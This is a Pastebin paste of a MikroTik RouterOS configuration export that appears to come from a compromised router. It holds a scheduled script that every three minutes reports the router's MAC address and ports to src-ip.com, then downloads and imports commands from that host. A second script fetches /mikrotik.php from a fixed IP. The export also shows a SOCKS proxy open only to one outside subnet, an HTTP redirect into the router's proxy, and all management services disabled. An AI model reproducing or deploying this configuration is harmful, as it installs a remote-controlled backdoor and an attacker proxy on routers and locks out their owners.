Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # model = 2011iL
- /interface bridge
- add fast-forward=no name=bridge.local
- /interface ethernet
- set [ find default-name=ether1 ] name=ether01
- set [ find default-name=ether5 ] name=ether05
- set [ find default-name=ether6 ] name=ether06
- set [ find default-name=ether9 ] name=ether09
- set [ find default-name=ether10 ] disabled=yes
- /interface pppoe-client
- add add-default-route=yes disabled=no interface=ether09 name=\
- pppoe.rt password=szt user=szt
- /interface wireless security-profiles
- set [ find default=yes ] supplicant-identity=MikroTik
- /ip pool
- add name=dhcp_pool0 ranges=192.168.8.1-192.168.8.253
- /ip dhcp-server
- add address-pool=dhcp_pool0 disabled=no interface=bridge.local name=dhcp1
- /system logging action
- set 0 memory-lines=1
- set 1 disk-file-name=log
- /interface bridge port
- add bridge=bridge.local interface=ether01
- add bridge=bridge.local interface=ether2
- add bridge=bridge.local interface=ether3
- add bridge=bridge.local interface=ether4
- add bridge=bridge.local interface=ether05
- /interface l2tp-server server
- set enabled=yes ipsec-secret=mm use-ipsec=yes
- /interface pptp-server server
- set enabled=yes
- /ip address
- add address=192.168.8.254/24 interface=bridge.local network=192.168.8.0
- add address=192.168.88.254/24 interface=bridge.local network=192.168.88.0
- /ip dhcp-server lease
- DELETE
- /ip dhcp-server network
- add address=192.168.8.0/24 dns-server=192.168.8.254 gateway=192.168.8.254
- /ip dns
- set allow-remote-requests=yes servers=77.88.8.8
- /ip dns static
- DELETE
- /ip firewall filter
- add action=drop chain=input disabled=yes dst-port=53 in-interface=\
- pppoe.rt protocol=tcp
- add action=drop chain=input disabled=yes dst-port=53 in-interface=\
- pppoe.rt protocol=udp
- add action=add-src-to-address-list address-list=Ok address-list-timeout=15s \
- chain=input comment=sysadminpxy dst-port=8080 protocol=tcp
- /ip firewall nat
- add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
- src-address-list=!Ok to-ports=8080
- add action=masquerade chain=srcnat out-interface=pppoe.rt \
- src-address=192.168.8.0/24
- add action=masquerade chain=srcnat out-interface=pppoe.rt \
- src-address=192.168.88.0/24
- add action=masquerade chain=srcnat out-interface=pppoe.rt \
- src-address=192.168.99.0/24
- /ip proxy
- set anonymous=yes enabled=yes
- /ip proxy access
- add action=deny
- /ip service
- set telnet disabled=yes
- set ftp disabled=yes
- set www disabled=yes
- set ssh disabled=yes
- set api disabled=yes
- set winbox disabled=yes
- set api-ssl disabled=yes
- /ip socks
- set enabled=yes port=45753
- /ip socks access
- add action=deny src-address=!95.154.216.128/25
- /ppp secret
- /system clock
- set time-zone-name=Europe/Moscow
- /system routerboard settings
- set silent-boot=no
- /system scheduler
- add interval=3m name="DDNS Serv" on-event="/system script run iDDNS" policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
- start-time=startup
- /system script
- add name=script4_ owner=admin policy=\
- ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
- ddress=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-resu\
- lt=no"
- add name=iDDNS owner=admin policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=":\
- global mac [/interface ethernet get 1 mac-address]\r\
- \n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
- \"_\".[/ip proxy get port])\r\
- \n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\
- \".[/interface pptp-server server get enabled])\r\
- \n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
- \n/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dns;:de\
- lay 3s\r\
- \n/import dns;:delay 4s;/file remove dns"
- /tool bandwidth-server
- set authenticate=no enabled=no
- /tool romon
- set enabled=yes secrets=DELETE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement